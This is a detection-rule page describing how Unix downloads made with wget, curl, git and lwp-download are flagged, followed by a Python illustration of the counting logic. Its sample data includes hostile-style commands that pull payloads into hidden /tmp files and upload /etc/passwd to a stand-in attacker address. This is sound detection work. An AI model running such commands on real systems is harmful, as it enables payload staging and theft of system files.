File Download (Unix)

Anvilogic Forge

Summary
This detection rule monitors file downloads on Unix-based hosts performed with the command-line transfer tools wget, curl, git, and lwp-download. It calls the get_endpoint_data and get_endpoint_data_unix functions to collect process-execution events, then applies a regular expression to the command line to keep only invocations of those tools. From each matching command it extracts the URI path of the requested resource, correlates it with the resulting filename and the context in which the command ran, and aggregates the results, including the number of unique URIs accessed and unique filenames written. Those counts let an analyst spot anomalies such as a download from an unexpected host or a burst of near-identical downloads, which is how these tools typically appear during payload staging.

To reduce false positives the rule drops invocations whose parameters indicate an upload rather than a download; that traffic is out of scope here. The rule is tagged with the threat actors 8220 Gang and TeamTNT, both of which are known to retrieve payloads onto compromised Linux hosts with these tools, so it is intended for hunting ingress tool transfer and related malicious activity. Because the same tools are used legitimately by build pipelines and administrators, the per-host counts are best read against a baseline for that host rather than alerted on individually.
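As an added example that is not part of the Anvilogic rule or its source, the following Python mirrors the summary's logic over a few constructed process-execution records: a regular expression picks out the four tools, invocations carrying upload-style parameters are discarded (the specific flags used here are an assumption; the rule's own exclusion list is not shown on this page), the URI and local filename are extracted, and unique URIs and filenames are counted per host. The hosts, users, command lines and the 203.0.113.9 address are all constructed.

```python
import re
import shlex
from collections import defaultdict
from urllib.parse import urlparse

# Tools named in the rule summary; the regex stands in for the rule's regex
# filter and tolerates an absolute path such as /usr/bin/curl.
TOOL_RE = re.compile(r"(?:^|/)(wget|curl|git|lwp-download)$")

# Flags that mark a request as an upload rather than a download. The rule
# excludes "certain parameters"; this particular list is an assumption of
# the example, not the rule's own.
UPLOAD_FLAGS = {
    "curl": {"-T", "--upload-file", "-F", "--form", "-d", "--data",
             "--data-binary", "--data-raw", "--data-urlencode"},
    "wget": {"--post-data", "--post-file"},
    "git": set(),
    "lwp-download": set(),
}

# Flags that name the local output file (value as the next argument or
# attached with '='). curl -O takes no value, so it is deliberately absent.
OUTPUT_FLAGS = {
    "curl": {"-o", "--output"},
    "wget": {"-O", "--output-document"},
    "git": set(),
    "lwp-download": set(),
}

URL_RE = re.compile(r"^(?:(?:https?|ftp|ssh|git)://\S+|[\w.-]+@[\w.-]+:\S+)$")


def _basename(url):
    """Local name a tool would default to for this URL (repo dir for git)."""
    path = urlparse(url).path if "://" in url else url.split(":", 1)[1]
    name = path.rstrip("/").rsplit("/", 1)[-1]
    return name[:-4] if name.endswith(".git") else name


def parse_download(cmdline):
    """Return (tool, uri, filename) for a download command, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:           # unbalanced quotes in a logged command line
        return None
    if not argv:
        return None
    m = TOOL_RE.search(argv[0])
    if not m:
        return None
    tool, args = m.group(1), argv[1:]
    if tool == "git":            # only 'git clone' fetches a remote tree
        if not args or args[0] != "clone":
            return None
        args = args[1:]
    if any(a.partition("=")[0] in UPLOAD_FLAGS[tool] for a in args):
        return None              # upload, not a download: out of scope
    filename, positional, i = None, [], 0
    while i < len(args):
        key, _, val = args[i].partition("=")
        if key in OUTPUT_FLAGS[tool]:
            if val:
                filename = val
            elif i + 1 < len(args):
                i += 1
                filename = args[i]
        elif not args[i].startswith("-"):
            positional.append(args[i])
        i += 1
    uri = next((p for p in positional if URL_RE.match(p)), None)
    if uri is None:
        return None
    if filename is None:
        # git clone and lwp-download accept an optional destination after the URL
        after = positional[positional.index(uri) + 1:]
        if tool in ("git", "lwp-download") and after:
            filename = after[0]
        else:
            filename = _basename(uri)
    return tool, uri, filename


def summarize(events):
    """Per-host counts of downloads, unique URIs and unique filenames.

    events: iterable of (host, user, cmdline) process-execution records.
    """
    stats = defaultdict(lambda: {"downloads": 0, "uris": set(), "filenames": set()})
    for host, _user, cmdline in events:
        parsed = parse_download(cmdline)
        if parsed is None:
            continue
        _tool, uri, filename = parsed
        s = stats[host]
        s["downloads"] += 1
        s["uris"].add(uri)
        s["filenames"].add(filename)
    return {h: {"downloads": s["downloads"],
                "unique_uris": len(s["uris"]),
                "unique_filenames": len(s["filenames"])}
            for h, s in stats.items()}


# Constructed sample records (host, user, command line); 203.0.113.9 is a
# documentation-range address, not a real indicator.
SAMPLE_EVENTS = [
    ("web01", "www-data", "curl -fsSL http://203.0.113.9/x86_64 -o /tmp/.x"),
    ("web01", "www-data", "/usr/bin/wget -q -O /tmp/kthreaddi http://203.0.113.9/kthreaddi"),
    ("web01", "www-data", "curl -O http://203.0.113.9/x86_64"),
    ("web01", "www-data", "curl -T /etc/passwd http://203.0.113.9/upload"),
    ("web01", "root", "ls -la /tmp"),
    ("build02", "ci", "git clone --depth 1 https://github.com/example/tool.git /opt/tool"),
    ("build02", "ci", "curl -d @report.json https://api.example.com/v1/report"),
    ("build02", "ci", "lwp-download https://example.com/pkg.tar.gz"),
]

if __name__ == "__main__":
    for host, counts in summarize(SAMPLE_EVENTS).items():
        print(host, counts)
```

On the sample data web01 shows two unique URIs fetched three times into three different filenames, the pattern of a host pulling a payload repeatedly, while the upload (curl -T, curl -d) and non-transfer commands are dropped before counting. A real deployment would feed the same function from the process events returned by get_endpoint_data_unix and compare the counts with that host's normal download volume.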
Categories
  • Endpoint
  • Linux
Data Sources
  • Process
  • File
ATT&CK Techniques
  • T1074.001
  • T1059.004
  • T1570
  • T1105
Created: 2024-02-09